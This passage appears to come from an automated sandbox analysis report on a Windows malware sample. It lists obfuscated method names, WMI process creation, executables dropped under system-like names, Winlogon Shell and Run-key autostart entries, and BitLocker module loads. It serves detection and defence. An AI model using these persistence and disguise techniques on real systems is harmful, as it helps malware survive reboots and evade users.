                          Source: W4tW72sfAD.exe, gI2.csHigh entropy of concatenated method names: 'G68', '_2c6', '_8U6', '_51G', 'PW5', '_1Fb', 'w5y', '_1FB', 'KXm', 'fE5'
                          Source: W4tW72sfAD.exe, k9J.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                          Source: W4tW72sfAD.exe, 6m2.csHigh entropy of concatenated method names: '_866', 'oy5', '_536', 'B6NghXgy7N5IU2L234G', 'cVgCMAgXWTKTDjcuQix', 'kDaYmlgINRPGCLEDKlG', 'tLvfwughP4FMqndlx6k', 't0HKS7gLjb99PJAYvQx', 'g2r', 'h95UZxgt472MeBv1a3i'
                          Source: W4tW72sfAD.exe, 7p8.csHigh entropy of concatenated method names: 'k6u', '_13E', 'SoH', 'cyxgFFZPA5rQgCJxeNr', 'rferiJZVUbxiWJFXGFZ', 'hbpay4ZMcVsnxYe2RjA', 'SWZFR2ZJgJQXp4p51Dn', 'zOjDNfZBKjbc82Xu5M1', 'rs9ryaZpa9tEqNXlwkl', 'Q22kLPZjAG73PtpgSpm'
                          Source: W4tW72sfAD.exe, 386.csHigh entropy of concatenated method names: 'Mic', '_7c8', 'WP9', 'EOG', 'dwE', '_397', '_4G4', '_6tB', '_16b', '_553'
                          Source: W4tW72sfAD.exe, cvm.csHigh entropy of concatenated method names: 'M98', 'Kr8', 'DXB', 'o21', '_256', '_995', '_8oE', 'ZlJ', 'WEz', 'm51'
                          Source: W4tW72sfAD.exe, l65.csHigh entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', '_322', '_8h4', 'wBSEkT9VCvXltqaIRs4', 'Qgd87m9MsFNEEjf1lLk', 'cTW11x9PxBZOLX43U0i'
                          Source: W4tW72sfAD.exe, q2i.csHigh entropy of concatenated method names: '_7O6', 'o8v', 'gkM0FMvPfnhHBD5LFaT', 'pZBcOCvJYrSBkovKMuV', 'WcVaZ8vBLhPCJJeV40O', 'GWLFJcvVQAVCwPwrNZJ', 'iqlCUevMYOtKwv5mDp6', 'iVXbNavptn41uQF2KKX', 'j0QsjRvjjj1JksLFQYL', 'wt60fHvWZsFhaBWKgch'
                          Source: W4tW72sfAD.exe, W58.csHigh entropy of concatenated method names: 'aE3', '_42V', 'MTrSr6vFa7FIBrRR2ft', 'oXFQhUvgQnnXM3bV7qf', 'WNj2H6v965rJElw4oIC', 'LkFnQivChwUY4MkPAmt', 'um9uEpvlgwLvvCVn405', 'd1g', '_171', 'u6E'
                          Source: W4tW72sfAD.exe, 52Z.csHigh entropy of concatenated method names: 'o19', 'box1nVA9h1QSs7sqa32', 'kvOCT6ACiQLdhC4fArq', 'M0a2kSAFkgxoAMUioQv', 'u8xYIYAs5qUIGvemMmd', 'ucaqUUAZU2mdKvbg8Dh', 'TitP36AAqShhphcaJEh', 'v3VwQRAl0s6FBuyUt9w', 'lWt7XbAH0GUJZjyXDKT', 'QFIqkXATNVXGZliwf62'
                          Source: W4tW72sfAD.exe, z8y.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'K17', '_8h4', 'RCEcv6CueCRlGjwD6Py', 'GEUNj2C8n7JHGyS29p5', 'I1HeSkC3K1DcjGYUn5F'
                          Source: W4tW72sfAD.exe, QTu.csHigh entropy of concatenated method names: 'g49', 'Dph', 'P3C', 'newDOhygBvTYr2YP5EN', 'HVFQVdylO4ZGY2tFZB9', 'jEFYOUyCfuG1duVIh3i', 'A2fCoyyFlq5AKfsUTef', 'hkQnh1yHwfL8CbQo9Ny', 'sTCphjyAdu9fdRAXqmF', 'C3BgqnyTqmZM7amgZEg'
                          Source: W4tW72sfAD.exe, 1o7.csHigh entropy of concatenated method names: '_4FP', '_141', 'Snm', '_156', 'jfh', 'zIhg3p7084kuBrmwJpQ', 'grm9Qo7Ghl1Z3SlkCn7', 'EYvBCY7mtrVZyEP5yrj', 'iV42KQ76OW79Tuyqygj', 'QZOXCP7aci4PFmMrXxo'

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Drops executable to a common third party application directory
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile written: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to behavior
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\hSShNgSi.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\yzZxaXSF.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\NWsvAoLz.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\nweImycr.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\eSWSCFMK.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\VRHDyDUj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\quERYeDq.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\Public\Downloads\RuntimeBroker.exeJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\fAbTigaR.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\ekLJkSsv.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\wHsyCTFf.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\LionObPB.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\EkAnmMVM.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\rrfZteSl.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\ZpKsdnCB.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\GNRoGDmH.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\kdoiNyxj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\QwkEqgro.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\HScOGmcH.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\DEgxfiAU.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\BazpdGXT.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\cnkBPSdA.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\ndjISZpy.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\JNNDResf.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\wexYWbhZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\NEEtYbtY.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\IhtNKAXm.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\WoNdSLwd.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\oQGhqvNX.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\UMwcyUfj.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\BuKwfPUT.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\cnkBPSdA.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\NEEtYbtY.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\ekLJkSsv.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\JNNDResf.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\kdoiNyxj.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\hSShNgSi.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\ZpKsdnCB.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\IhtNKAXm.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\yzZxaXSF.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\user\Desktop\oQGhqvNX.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\NWsvAoLz.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\EkAnmMVM.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\wHsyCTFf.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\ndjISZpy.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\fAbTigaR.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\VRHDyDUj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\UMwcyUfj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\LionObPB.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\DEgxfiAU.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\BuKwfPUT.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\nweImycr.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\eSWSCFMK.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\WoNdSLwd.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\quERYeDq.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\BazpdGXT.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\rrfZteSl.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\QwkEqgro.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\HScOGmcH.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\GNRoGDmH.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile created: C:\Users\user\Desktop\wexYWbhZ.logJump to dropped file

                          Boot Survival

                          barindex
                          Creates an undocumented autostart registry key
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Drops PE files to the user root directory
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhDJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
